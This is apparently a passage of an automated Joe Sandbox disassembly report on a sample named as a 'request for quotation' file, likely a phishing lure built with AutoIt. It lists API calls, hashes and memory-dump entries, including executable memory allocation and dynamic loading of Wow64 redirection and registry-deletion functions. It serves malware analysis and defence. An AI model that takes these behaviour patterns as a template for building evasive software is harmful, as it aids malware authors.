                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2625713937-0
                                                                                                                                                                                                                              • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                                                                                                                                                                              • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                                                                                                • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                                • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 00412ECD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                                              • API String ID: 1943609520-557222456
                                                                                                                                                                                                                              • Opcode ID: 548adfe6164c1e4cfce0c2d63cd673d501bfdf50d4e49bf1c2f53fe2a8823d58
                                                                                                                                                                                                                              • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 548adfe6164c1e4cfce0c2d63cd673d501bfdf50d4e49bf1c2f53fe2a8823d58
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ContainedObject
                                                                                                                                                                                                                              • String ID: AutoIt3GUI$Container$%I
                                                                                                                                                                                                                              • API String ID: 3565006973-4251005282
                                                                                                                                                                                                                              • Opcode ID: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                                                                                                                                                                                                                              • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                                                                                                                                                                                                • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorHandling__87except__start
                                                                                                                                                                                                                              • String ID: pow
                                                                                                                                                                                                                              • API String ID: 2905807303-2276729525
                                                                                                                                                                                                                              • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                                                                                                                                                              • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                                              • String ID: 3cA$_A
                                                                                                                                                                                                                              • API String ID: 4104443479-3480954128
                                                                                                                                                                                                                              • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                                                                                                                                                              • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$Window
                                                                                                                                                                                                                              • String ID: SysMonthCal32
                                                                                                                                                                                                                              • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                              • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                                                                                                                                                              • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                              • String ID: Listbox
                                                                                                                                                                                                                              • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                              • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                                                                                                                                                              • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __calloc_crt
                                                                                                                                                                                                                              • String ID: K$@BL
                                                                                                                                                                                                                              • API String ID: 3494438863-2209178351
                                                                                                                                                                                                                              • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                                                                                                                                                              • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 2574300362-3689287502
                                                                                                                                                                                                                              • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                                                                                                                                                              • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 2574300362-1355242751
                                                                                                                                                                                                                              • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                                                                                                                                                              • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                              • API String ID: 2574300362-4033151799
                                                                                                                                                                                                                              • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                                                                                                                                                              • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 2574300362-199464113
                                                                                                                                                                                                                              • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                                                                                                                                                              • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                                                                                                                                                              • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                                                                                                                                                                                                • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0047E314
                                                                                                                                                                                                                              Memory Dump Source
